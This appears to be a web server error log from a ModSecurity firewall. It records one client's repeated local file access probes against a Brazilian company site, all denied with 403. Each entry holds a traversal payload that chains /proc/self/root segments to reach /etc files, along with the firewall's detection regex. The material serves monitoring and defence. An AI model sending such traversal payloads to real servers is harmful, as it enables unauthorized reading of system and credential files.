[Mon Mar 16 17:09:20.033277 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:38726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjcP9ocpUE4ed4uDwImgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:21.317397 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.243.203:44742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjcUr9dMAiw-8KANNdPQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:22.707270 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.243.203:44752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjcqQpVkWug9HeOt9LjgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:23.923249 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.243.203:44754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjc6TCbgAP5jq5TehChgAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:25.279035 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.243.203:44756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjdVajLEzk2WiQ-10onwAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:26.616766 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:44772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjdrysWC90G-1nBrBZ9QAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:27.863489 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:44776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjd9SswJuvopo3lOh05wAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:29.225535 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.243.203:44790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjeVajLEzk2WiQ-10ooQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:30.631865 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:45776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjerysWC90G-1nBrBZ9gAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:31.814986 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:45782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhje6TCbgAP5jq5TehChwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:33.031247 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.243.203:45784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjfVajLEzk2WiQ-10opAAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:34.321587 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:45798] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjflajLEzk2WiQ-10opwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:35.650355 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.243.203:45812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjf0r9dMAiw-8KANNdPwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:36.830764 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.243.203:45816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjgEr9dMAiw-8KANNdQAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:38.159460 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:45826] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjgqQpVkWug9HeOt9LlQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:39.556105 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:45834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjg8_BxrYCr4hPDw8AKQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:40.794044 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:37962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjhFajLEzk2WiQ-10oqAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:41.987378 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:37978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjhdSswJuvopo3lOh06QAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:43.365522 2026] [:error] [pid 29802:tid 140411590858496] [client 74.7.243.203:37984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjh8_BxrYCr4hPDw8AKgAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:44.641950 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.243.203:37990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjiEr9dMAiw-8KANNdQwAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:45.965796 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:38006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjibysWC90G-1nBrBZ_QAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:47.227801 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.243.203:38022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhji6QpVkWug9HeOt9LlwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
